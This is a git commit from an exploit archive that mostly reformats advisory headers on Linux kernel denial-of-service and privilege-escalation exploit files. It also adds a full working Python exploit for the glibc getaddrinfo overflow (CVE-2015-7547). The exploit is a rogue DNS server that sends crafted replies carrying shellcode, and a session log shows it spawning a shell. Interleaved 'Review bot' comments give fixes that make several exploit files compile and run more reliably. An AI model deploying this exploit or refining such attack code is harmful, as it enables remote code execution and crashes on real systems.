DB: 2016-09-07

3 new exploits

Too many to list!
Offensive Security 2016-09-07 05:09:19 +00:00
parent 479ae86249
commit d36011b4f9
70 changed files with 5730 additions and 5054 deletions

10077
files.csv

File diff suppressed because it is too large

View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/4051/info
AtheOS is a freely available, open source operating system. It is distributed under the GPL, and maintained by the AtheOS project.
It is possible to escape change rooted directories on AtheOS. Due to insufficient handling of relative pathes, a process in the change rooted directory may change directory using the dot-dot-slash (../) specifier. This would allow access to the system with the privileges of the change rooted process.
*/
#include <stdio.h>
#include <unistd.h>

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/3220/info
It has been reported that there is a locally exploitable vulnerability in BSDI.
@ -5,6 +6,7 @@ It has been reported that there is a locally exploitable vulnerability in BSDI.
It is allegedly possible for a userland process to cause the kernel to halt.
This may be due to a bad system call.
*/
/* (BSDi)*[v3.0/3.1] system failure, by
v9[v9@realhalo.org]. this will result

View file

@ -66,7 +66,7 @@ def usage():
print "CSRF Generator --> Buffer Overflow PoC [Needs to be ran as a SuperUser]"
print "By: Elvis Collado [b1ack0wl]"
print ""
print "Usage: %s -s source.ip -d dst.ip % sys.argv[0]
print "Usage: %s -s source.ip -d dst.ip" % sys.argv[0]
print ""
print "\t-s Connect back IP [LHOST]"
print "\t-d Destination IP of Socket Listener [RHOST]"
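Review bot: the corrected usage line now terminates the string literal before the `%` operator (`print "Usage: %s -s source.ip -d dst.ip" % sys.argv[0]`); the earlier form was a SyntaxError, which in Python 2 stops the whole file from being compiled, not just usage(). Worth scanning the remaining print statements in this file for the same unterminated-string pattern before merging, since any one of them fails the module at parse time.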

View file

@ -1,6 +1,9 @@
/*
source: http://www.securityfocus.com/bid/147/info
The "Smurf" denial of service exploits the existance, and forwarding of, packets sent to IP broadcast addreses. By creating an ICMP echo request packet, with the source address set to an IP within the network to be attacked, and the destination address the IP broadcast address of a network which will forward and respond to ICMP echo packets sent to broadcast. Each packet sent in to the network being used to conduct the attack will be responded to by any machine which will respond to ICMP on the broadcast address. Therefore, a single packet can result in an overwhelming response count, all of which are directed to the network the attacker has forged as the source. This can result in significant bandwidth loss.
*/
/*
*

View file

@ -1,9 +1,12 @@
/*
source: http://www.securityfocus.com/bid/343/info
It is possible to leak kernel memory and render TCP ports above 1024 unusable, locked forever in the CLOSE_WAIT state in linux kernels prior to the late 2.1.x and 2.2.0pre releases. In addition to being intentionally exploited, unix applications compiled on linux that are multithreaded may also cause these problems.
Below is a harmless example of the exploit:
*/
// This program will kill a random port on a linux machine. The kernel will

View file

@ -1,6 +1,9 @@
/*
source: http://www.securityfocus.com/bid/363/info
The 2.0.x kernels have a quirk in the TCP implementation that have to do with the accept() call returning after only a syn has been recieved (as opposed to the three way handshake having been completed). Sendmail, which is compiled on many unices, makes the assumption that the three way handshake has been completed and a tcp connection has been fully established. This trust in a standard tcp implementation is seen in the following section of code <src/daemon.c>:
*/
t = accept(DaemonSocket,
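Review bot: the closing */ lands before `t = accept(DaemonSocket,`, which is the start of the sendmail excerpt that the description introduces with "the following section of code <src/daemon.c>". That excerpt is quoted text, not code belonging to this program, so it needs to stay inside the header comment; as placed, a C compiler would see a top-level statement and fail. Move the */ to after the quoted daemon.c section.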

View file

@ -1,6 +1,9 @@
/*
source: http://www.securityfocus.com/bid/1072/info
A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable.
*/
#include <sys/types.h>
#include <sys/socket.h>

View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/6420/info
A denial of service vulnerability has been discovered in the Linux 2.2 kernel. It has been reported that it is possible for an unprivileged user to cause the kernel to stop responding due to a bug in the implementation of mmap().
It should be noted that this issue does not affect the 2.4 kernel tree. This is because support for mmap() in the /proc/pid/mem implementation has been dropped.
*/
#define PAGES 10

View file

@ -1,6 +1,9 @@
/*
source: http://www.securityfocus.com/bid/10096/info
A vulnerability has been reported in the Linux Kernel that may permit a malicious local user to affect a system-wide denial of service condition. This issue may be triggered via the Kernel signal queue (struct sigqueue) and may be exploited to exhaust the system process table by causing an excessive number of threads to be left in a zombie state.
*/
#include <signal.h>
#include <unistd.h>

View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/10264/info
PaX for 2.6 series Linux kernels has been reported prone to a local denial of service vulnerability. The issue is reported to present itself when PaX Address Space Layout Randomization Layout (ASLR) is enabled.
The vulnerability may be exploited by a local attacker to influence the kernel into an infinite loop.
*/
/*
PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/11842/info
The Linux Kernel is reported prone to a local denial of service vulnerability. It is reported that the vulnerability exists due to a failure by 'aio_free_ring' to handle exceptional conditions.
@ -7,6 +8,8 @@ This vulnerability requires that mmap() is employed to map the maximum amount of
It is reported that when handing 'io_setup' syscalls that are passed large values, the Linux kernel 'aio_setup_ring' will attempt to allocate a structure of page pointers.
When a subsequent 'aio_setup_ring' mmap() call fails, 'aio_free_ring' attempts to clean up the page pointers, it will crash during this procedure triggering a kernel panic.
*/
#include <signal.h>
#include <sys/mman.h>

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/12949/info
A local denial of service vulnerability reportedly affects the Linux kernel. This issue arises due to a failure of the kernel to properly handle malicious, excessive file locks.
@ -5,6 +6,8 @@ A local denial of service vulnerability reportedly affects the Linux kernel. Thi
An attacker may leverage this issue to crash or hang the affected kernel and deny service to legitimate users.
It should be noted that Symantec has been unable to reproduce this issue after testing. It is possible that this vulnerability is linked to the reporter's specific configuration. More information will be added as it becomes available.
*/
#include <stdio.h>
#include <stdlib.h>

View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/15156/info
Linux Kernel is reported prone to a local denial-of-service vulnerability.
This issue arises from an infinite loop when binding IPv6 UDP ports.
*/
/*
* Linux kernel

View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/15365/info
Linux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from a failure to properly unregister kernel resources when network devices are removed.
This issue allows local attackers to deny service to legitimate users. Attackers may also be able to execute arbitrary code in the context of the kernel, but this has not been confirmed.
*/
/*
* Linux kernel

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/15627/info
Linux kernel is susceptible to a local denial-of-service vulnerability.
@ -7,6 +8,7 @@ Local attackers may trigger this issue by obtaining numerous file-lock leases, w
This issue allows local attackers to consume excessive kernel memory, eventually leading to an out-of-memory condition and a denial of service for legitimate users.
Kernel versions prior to 2.6.15-rc3 are vulnerable to this issue.
*/
#include <unistd.h>

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/15745/info
Linux kernel is susceptible to a local denial-of-service vulnerability.
@ -7,6 +8,8 @@ This issue is triggered when excessive kernel memory is consumed by numerous fil
This issue allows local attackers to consume excessive kernel memory, eventually leading to an out-of-memory condition and ultimately to a denial of service for legitimate users.
Kernel versions from 2.6.10 through to 2.6.14.2 are vulnerable to this issue.
*/
#include <unistd.h>

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/15846/info
Linux kernel is prone to a local integer-overflow vulnerability.
@ -5,6 +6,8 @@ Linux kernel is prone to a local integer-overflow vulnerability.
A successful attack can result in a kernel crash. Arbitrary code execution may be possible as well, but this has not been confirmed.
All 2.6.x versions of the Linux kernel are considered vulnerable at the moment.
*/
#define _GNU_SOURCE
#define __USE_FILE_OFFSET64

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/16135/info
Linux kernel is prone to a local denial-of-service vulnerability.
@ -5,6 +6,8 @@ Linux kernel is prone to a local denial-of-service vulnerability.
This issue affects the 'set_mempolicy()' function of the 'mm/mempolicy.c' file.
Successful exploitation causes the kernel to crash, leading to a denial-of-service condition.
*/
#include <asm/unistd.h>

View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/23142/info
The Linux kernel is prone to a NULL-pointer dereference vulnerability.
A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. The attacker may also be able to execute arbitrary code with elevated privileges, but this has not been confirmed.
*/
__ ip2.c __
// advanced exploit code for catastrophic kernel bug by Joey Mengele, professional hacker
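Review bot: `__ ip2.c __` sits between the new closing */ and the `//` header line that follows, so it is outside any comment and will not compile as C (it tokenises as bare identifiers). Either pull it into the header comment or prefix it with `//` like the line below it.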

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/23677/info
The Linux kernel is prone to a denial-of-service vulnerability. This issue presents itself when a NETLINK message is misrouted.
@ -5,6 +6,7 @@ The Linux kernel is prone to a denial-of-service vulnerability. This issue prese
A local attacker may exploit this issue to trigger an infinite-recursion stack-based overflow in the kernel. This results in a denial of service to legitimate users.
Versions prior to 2.6.20.8 are vulnerable.
*/
#include <assert.h>
#include <stdio.h>

View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/24134/info
The Linux Kernel is prone to a denial-of-service vulnerability.
A local attacker can exploit this issue to cause the kernel to crash, effectively denying service to legitimate users.
*/
#include <sys/types.h>
#include <sys/ioctl.h>

View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/26943/info
The Linux kernel is prone to a remote denial-of-service vulnerability because it fails to adequately validate specially crafted IPv6 'Hop-By-Hop' headers.
Attackers can exploit this issue to cause a kernel panic, denying service to legitimate users.
*/
/*
* Clemens Kurtenbach <ckurtenbach at s21sec . com>

View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/29945/info
The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition.
Attackers can exploit this issue to cause the kernel to become unresponsive, denying service to legitimate users.
*/
#include <stdlib.h>
#include <sys/ptrace.h>

View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/29945/info
The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition.
Attackers can exploit this issue to cause the kernel to become unresponsive, denying service to legitimate users.
*/
/* This software is provided 'as-is', without any express or implied
warranty. In no event will the authors be held liable for any

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/32985/info
The Linux kernel is prone to a local denial-of-service vulnerability.
@ -5,6 +6,8 @@ The Linux kernel is prone to a local denial-of-service vulnerability.
Local attackers can exploit this issue to cause a soft lockup, denying service to legitimate users.
Versions prior to Linux kernel 2.6.25 are vulnerable.
*/
#include <stdio.h>
#include <unistd.h>

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/35143/info
The Linux kernel is prone to a local denial-of-service vulnerability.
@ -9,6 +10,8 @@ This issue was introduced in Linux Kernel 2.6.19. The following versions have be
Linux Kernel 2.6.30-rc3
Linux Kernel 2.6.27.24
Linux Kernel 2.6.29.4
*/
pipe(pfds);
snprintf(buf, sizeof(buf), "/tmp/%d", getpid());

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/35976/info
The Linux kernel is prone to a local denial-of-service vulnerability.
@ -5,6 +6,8 @@ The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
This issue was introduced in Linux kernel 2.6.28-rc1 and fixed in 2.6.31-rc5-git3.
*/
#include <time.h>

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/36191/info
The Linux kernel is prone to a local denial-of-service vulnerability.
@ -5,6 +6,8 @@ The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
This issue was introduced in Linux kernel 2.6.26 and fixed in 2.6.31-rc8.
*/
/* gcc -o KernelTtyTest KernelTtyTest.c -Wall -O2 -lutil */
#define _GNU_SOURCE 1

View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/38185/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
*/
/* gcc -std=gnu99 -O2 -g -lpthread -lrt tunload.c -o tunload */

View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/45036/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users.
*/
#include <sys/inotify.h>
#include <unistd.h>

View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/46630/info
The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities.
Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users.
*/
#include <unistd.h>
#include <sys/epoll.h>

View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/46630/info
The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities.
Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users.
*/
#include <unistd.h>
#include <sys/epoll.h>

View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/47296/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users.
*/
#include <sys/inotify.h>
#include <unistd.h>

View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/48101/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to trigger a kernel crash, which may result in a denial-of-service condition.
*/
#include <stdio.h>
#include <stdlib.h>

View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/60586/info
The Linux Kernel is prone to a local denial-of-service vulnerability.
Local attackers can exploit this issue to trigger an infinite loop which may cause denial-of-service conditions.
*/
/*
** PoC - kernel <= 3.10 CPU Thread consumption in ext4 support. (Infinite loop)

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/1322/info
POSIX "Capabilities" have recently been implemented in the Linux kernel. These "Capabilities" are an additional form of privilege control to enable more specific control over what priviliged processes can do. Capabilities are implemented as three (fairly large) bitfields, which each bit representing a specific action a privileged process can perform. By setting specific bits, the actions of priviliged processes can be controlled -- access can be granted for various functions only to the specific parts of a program that require them. It is a security measure. The problem is that capabilities are copied with fork() execs, meaning that if capabilities are modified by a parent process, they can be carried over. The way that this can be exploited is by setting all of the capabilities to zero (meaning, all of the bits are off) in each of the three bitfields and then executing a setuid program that attempts to drop priviliges before executing code that could be dangerous if run as root, such as what sendmail does. When sendmail attempts to drop priviliges using setuid(getuid()), it fails not having the capabilities required to do so in its bitfields. It continues executing with superuser priviliges, and can run a users .forward file as root leading to a complete compromise. Procmail can also be exploited in this manner.
@ -20,6 +21,8 @@ set
a simple su - yomama should give you root.
This exploit was written by me in a hurry, I hope there are no mistakes
*/
-- snip -- ex.c --
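Review bot: `-- snip -- ex.c --` is left outside the comment that the new */ closes; if this file is to build as C, the marker (and any other writeup text between the header and the exploit code) has to stay inside the comment or be prefixed with `//`. The simplest fix is to move the */ to just after the snip marker.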

View file

@ -1,6 +1,6 @@
source: http://www.securityfocus.com/bid/9550/info
// source: http://www.securityfocus.com/bid/9550/info
The 0verkill game client has been reported prone to multiple instances of exploitable buffer overrun vulnerabilities. The functions that have been reported to be affected are load_cfg(), save_cfg() and send_message(). It has been reported that due to a lack of sufficient boundary checks performed on user supplied data, an attacker may exploit the issues to execute arbitrary instructions in the security context of the Overkill game client.
// The 0verkill game client has been reported prone to multiple instances of exploitable buffer overrun vulnerabilities. The functions that have been reported to be affected are load_cfg(), save_cfg() and send_message(). It has been reported that due to a lack of sufficient boundary checks performed on user supplied data, an attacker may exploit the issues to execute arbitrary instructions in the security context of the Overkill game client.
/*
* Simple local exploit for 0verkill by pi3 (pi3ki31ny)
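Review bot: prefixing the two header lines with `//` gets the file compiling again (bare advisory text before the `/*` was a syntax error), but it leaves this header in a different style from the `/* ... */` block used for the same source/description header in every other file in this commit. Wrapping both lines in a block comment, as done elsewhere, keeps the corpus uniform and avoids two very long single-line comments.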

View file

@ -1,6 +1,8 @@
/*
source: http://www.securityfocus.com/bid/9596/info
VServer is reported prone to a breakout vulnerability that allows a malicious user to escape from the context of the chrooted root directory of the virtual server. This issue is due to the VServer application failing to secure itself against a "chroot-again" style vulnerability. Successful exploitation of this issue may allow an attacker to gain access to the filesystem outside of the chrooted root directory.
*/
/* vserver@deadbeef.de modified the chroot-again exploit */
/* to work on vservers with "chmod 000 /vservers" */

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/22014/info
Grsecurity Kernel PaX is prone to a local privilege-escalation vulnerability.
@ -7,6 +8,7 @@ An attacker can exploit this issue to obtain superuser privileges. A successful
NOTE: The vendor disputes the issue, stating that the application is not vulnerable.
Digital Armaments has provided an exploit and updated advisory outlining specific details of this vulnerability. Please see the reference section for further information.
*/
/*
** expand_stack() PaX local root vulnerability

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/25774/info
The Linux kernel is prone to a local privilege-escalation vulnerability.
@ -5,6 +6,8 @@ The Linux kernel is prone to a local privilege-escalation vulnerability.
Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.
Versions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue.
*/
/*
* exploit for x86_64 linux kernel ia32syscall emulation

View file

@ -1,10 +1,14 @@
/*
source: http://www.securityfocus.com/bid/25774/info
/*
The Linux kernel is prone to a local privilege-escalation vulnerability.
Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.
Versions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue.
*/
/*
*****************************************************************************************
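Review bot: the header opens a comment on its first line and then carries a second `/*` on the third line of the hunk, before the description; C block comments do not nest, so the inner opener is inert, but gcc emits a -Wcomment warning (enabled by -Wall) for a `/*` inside a comment. Drop the redundant inner `/*` so the header matches the `/* source: ... */` layout used in the sibling file for the same BID.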

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/33846/info
The Linux Kernel is prone to an information-disclosure vulnerability because it fails to properly initialize certain memory before using using it in a user-accessible operation.
@ -5,6 +6,8 @@ The Linux Kernel is prone to an information-disclosure vulnerability because it
Successful exploits will allow attackers to view portions of kernel memory. Information harvested may be used in further attacks.
Versions prior to Linux Kernel 2.6.28.8 are vulnerable.
*/
int main(void)
{

View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/44758/info
The Linux kernel is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
*/
/*
* You've done it. After hours of gdb and caffeine, you've finally got a shell

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/50573/info
The Linux kernel is prone to a local information-disclosure weakness.
@ -5,6 +6,8 @@ The Linux kernel is prone to a local information-disclosure weakness.
Successful exploits allow local attackers to obtain the password length of a victim's account; information harvested may aid in further attacks.
Linux kernel 3.1 and prior are vulnerable.
*/
/*
* A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1.

View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/54702/info
The Linux kernel is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
*/
/***************** rds_client.c ********************/

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/68048/info
The Linux kernel is prone to a local information-disclosure vulnerability.
@ -5,6 +6,7 @@ The Linux kernel is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to cause a memory leak to obtain sensitive information that may lead to further attacks.
Linux kernel 2.6.38 through 3.15-rc2 are vulnerable.
*/
/*
* $File: media-enum-poc.c

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/5503/info
MySQL is is an open source relational database project, and is available for a number of operating systems, including Microsoft Windows.
@ -5,6 +6,7 @@ MySQL is is an open source relational database project, and is available for a n
A weak default configuration problem has been reported in the Windows binary release of MySQL. Reportedly, the root user of the database is defined with no password, and granted login privileges from any host.
This issue has been reported in the Windows binary release of MySQL. Other versions may share this default configuration, this has not however been confirmed.
*/
//mysqlfuck.c
/*--||MySQLfuck||--*/

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/5503/info
MySQL is is an open source relational database project, and is available for a number of operating systems, including Microsoft Windows.
@ -5,6 +6,7 @@ MySQL is is an open source relational database project, and is available for a n
A weak default configuration problem has been reported in the Windows binary release of MySQL. Reportedly, the root user of the database is defined with no password, and granted login privileges from any host.
This issue has been reported in the Windows binary release of MySQL. Other versions may share this default configuration, this has not however been confirmed.
*/
/*
Program: finger_mysql.c

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/6527/info
A vulnerability has been discovered in H-Sphere Webshell. During the pre-authentication phase Webshell fails to perform sufficient bounds checking on user-supplied HTTP parameters. As a result, a malicious attacker may be able to trigger a buffer overrun.
@ -5,6 +6,7 @@ A vulnerability has been discovered in H-Sphere Webshell. During the pre-authent
Successful exploitation of this issue would allow an attacker to overwrite the vulnerable function's instruction pointer. By causing the program to return to attacker-supplied instructions, it may be possible to execute arbitrary code with the privileges of the target process.
It should be noted that this issue was discovered in H-Sphere 2.3 RC3. It is not yet known whether earlier versions are also vulnerable.
*/
/*
* Remote r00t exploit for Webshell 2.4 (possibly other versions).

238
platforms/linux/remote/40339.py Executable file
View file

@ -0,0 +1,238 @@
'''
add by SpeeDr00t@Blackfalcon (jang kyoung chip)
This is a published vulnerability by google in the past.
Please refer to the link below.
Reference:
- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html
- https://github.com/fjserna/CVE-2015-7547
- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow
When Google announced about this code(vulnerability),
it was missing information on shellcode.
So, I tried to completed the shellcode.
In the future, I hope to help your study.
(gdb) gdb -q client1
Undefined command: "gdb". Try "help".
(gdb) r
Starting program: /home/haker/client1
Got object file from memory but can't read symbols: File truncated.
[UDP] Total Data len recv 36
[UDP] Total Data len recv 36
udp send
sendto 1
TCP Connected with 127.0.0.1:60259
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
data1 = <EFBFBD><EFBFBD>foobargooglecom
query = foobargooglecom$(<EFBFBD>foobargooglecom
[TCP] Request2 len recv 36
sendto 2
data1_reply
data2_reply
[UDP] Total Data len recv 36
[UDP] Total Data len recv 36
udp send
sendto 1
TCP Connected with 127.0.0.1:60260
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
data1 = <EFBFBD><EFBFBD>foobargooglecom
query = foobargooglecom$<EFBFBD>7foobargooglecom
[TCP] Request2 len recv 36
sendto 2
data1_reply
data2_reply
process 6415 is executing new program: /bin/dash
$ id
uid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
$
'''
import socket
import time
import struct
import threading
IP = '192.168.111.5' # Insert your ip for bind() here...
ANSWERS1 = 184
terminate = False
last_reply = None
reply_now = threading.Event()
def dw(x):
return struct.pack('>H', x)
def dd(x):
return struct.pack('>I', x)
def dl(x):
return struct.pack('<Q', x)
def db(x):
return chr(x)
def udp_thread():
global terminate
# Handle UDP requests
sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_udp.bind((IP, 53))
reply_counter = 0
counter = -1
answers = []
while not terminate:
data, addr = sock_udp.recvfrom(1024)
print '[UDP] Total Data len recv ' + str(len(data))
id_udp = struct.unpack('>H', data[0:2])[0]
query_udp = data[12:]
# Send truncated flag... so it retries over TCP
data = dw(id_udp) # id
data += dw(0x8380) # flags with truncated set
data += dw(1) # questions
data += dw(0) # answers
data += dw(0) # authoritative
data += dw(0) # additional
data += query_udp # question
data += '\x00' * 2500 # Need a long DNS response to force malloc
answers.append((data, addr))
if len(answers) != 2:
continue
counter += 1
if counter % 4 == 2:
answers = answers[::-1]
print 'udp send '
time.sleep(0.01)
sock_udp.sendto(*answers.pop(0))
print 'sendto 1 '
reply_now.wait()
sock_udp.sendto(*answers.pop(0))
print 'sendto 2 '
sock_udp.close()
def tcp_thread():
global terminate
counter = -1
#Open TCP socket
sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_tcp.bind((IP, 53))
sock_tcp.listen(10)
print 'a'
while not terminate:
conn, addr = sock_tcp.accept()
counter += 1
print 'TCP Connected with ' + addr[0] + ':' + str(addr[1])
# Read entire packet
data = conn.recv(1024)
print '[TCP] Total Data len recv ' + str(len(data))
reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])
print '[TCP] Request1 len recv ' + str(reqlen1)
data1 = data[2:2+reqlen1]
print 'data1 = ' +data1
id1 = struct.unpack('>H', data1[0:2])[0]
query1 = data[12:]
print 'query = ' + query1
# Do we have an extra request?
data2 = None
if len(data) > 2+reqlen1:
reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])
print '[TCP] Request2 len recv ' + str(reqlen2)
data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]
id2 = struct.unpack('>H', data2[0:2])[0]
query2 = data2[12:]
# Reply them on different packets
data = ''
data += dw(id1) # id
data += dw(0x8180) # flags
data += dw(1) # questions
data += dw(ANSWERS1) # answers
data += dw(0) # authoritative
data += dw(0) # additional
data += query1 # question
for i in range(ANSWERS1):
answer = dw(0xc00c) # name compressed
answer += dw(1) # type A
answer += dw(1) # class
answer += dd(13) # ttl
answer += dw(4) # data length
answer += 'D' * 4 # data
data += answer
data1_reply = dw(len(data)) + data
if data2:
data = ''
data += dw(id2)
data += 'A' * (6)
data += '\x08\xc5\xff\xff\xff\x7f\x00\x00'
data += '\x90' * (44)
data += '\x90' * (1955)
data += '\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
data += '\x90' * (100)
data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00'
data += 'F' * (8)
data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00'
data += 'G' * (134)
data2_reply = dw(len(data)) + data
else:
data2_reply = None
reply_now.set()
time.sleep(0.01)
conn.sendall(data1_reply)
print 'data1_reply'
time.sleep(0.01)
if data2:
conn.sendall(data2_reply)
print 'data2_reply'
reply_now.clear()
sock_tcp.shutdown(socket.SHUT_RDWR)
sock_tcp.close()
if __name__ == "__main__":
t = threading.Thread(target=udp_thread)
t.daemon = True
t.start()
tcp_thread()
terminate = True
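Review bot: `terminate = True` after `tcp_thread()` is dead code: tcp_thread only leaves its loop once `terminate` is already set, and otherwise blocks indefinitely in accept(), so the UDP daemon thread is only ever stopped by process exit and the `sock_tcp.shutdown` / `sock_tcp.close` lines never run. Catch KeyboardInterrupt around the `tcp_thread()` call and set the flag there (with a timeout on accept() so the loop can observe it), or remove the flag altogether. Two smaller points: `IP` is a hard-coded bind address that every user has to edit by hand (an argv parameter would do), and the `print` statements plus str-based byte packing make this Python 2 only, which the header should state; `db`, `dl` and the `counter` in tcp_thread are defined but never used.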

View file

@ -1,6 +1,9 @@
/*
source: http://www.securityfocus.com/bid/526/info
Operating systems with a shared memory implementation based on or influenced by the 4.4BSD code may be vulnerable to a denial of service attack The problem exists because you can mmap() or shmget() as much memory as you'd like bypassing rlimits. When you trigger pagefaults, the system will begin allocating the memory (it's not actually allocated at first) and run out. With System V IPC the memory remains allocated even after the process has stopped running.
*/
/*
* This program can be used to exploit DoS bugs in the VM systems or utility

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
@ -5,6 +6,7 @@ A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
*/
/*
* imland - improved multiple land

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
@ -5,6 +6,8 @@ A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
